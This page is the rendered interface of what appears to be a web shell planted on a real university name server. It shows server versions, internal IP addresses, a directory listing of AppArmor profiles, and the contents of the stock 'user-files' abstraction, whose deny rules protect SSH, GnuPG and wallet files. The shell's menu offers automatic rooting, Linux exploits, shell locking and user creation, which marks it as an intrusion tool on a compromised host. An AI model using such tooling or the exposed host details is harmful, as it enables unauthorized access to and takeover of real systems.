Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
etc /
apparmor.d /
abstractions /
ubuntu-browsers.d /
[ HOME SHELL ]
Name
Size
Permission
Action
chromium-browser
1018
B
-rw-r--r--
java
3.8
KB
-rw-r--r--
kde
265
B
-rw-r--r--
mailto
339
B
-rw-r--r--
multimedia
1.38
KB
-rw-r--r--
plugins-common
351
B
-rw-r--r--
productivity
894
B
-rw-r--r--
text-editors
672
B
-rw-r--r--
ubuntu-integration
1.11
KB
-rw-r--r--
ubuntu-integration-xul
185
B
-rw-r--r--
user-files
935
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-files
# vim:syntax=apparmor abi <abi/3.0>, # Allow read to all files user has DAC access to and write access to all # files owned by the user in $HOME. @{HOME}/ r, @{HOME}/** r, owner @{HOME}/** w, # Do not allow read and/or write to particularly sensitive/problematic files include <abstractions/private-files> audit deny @{HOME}/.ssh/{,**} mrwkl, audit deny @{HOME}/.gnome2_private/{,**} mrwkl, audit deny @{HOME}/.kde{,4}/{,share/,share/apps/} w, audit deny @{HOME}/.kde{,4}/share/apps/kwallet/{,**} mrwkl, audit deny @{HOME}/.local/share/kwalletd/{,**} mrwkl, # Comment this out if using gpg plugin/addons audit deny @{HOME}/.gnupg/{,**} mrwkl, # Allow read to all files user has DAC access to and write for files the user # owns on removable media and filesystems. /media/** r, /mnt/** r, /srv/** r, /net/** r, owner /media/** w, owner /mnt/** w, owner /srv/** w, owner /net/** w,
Close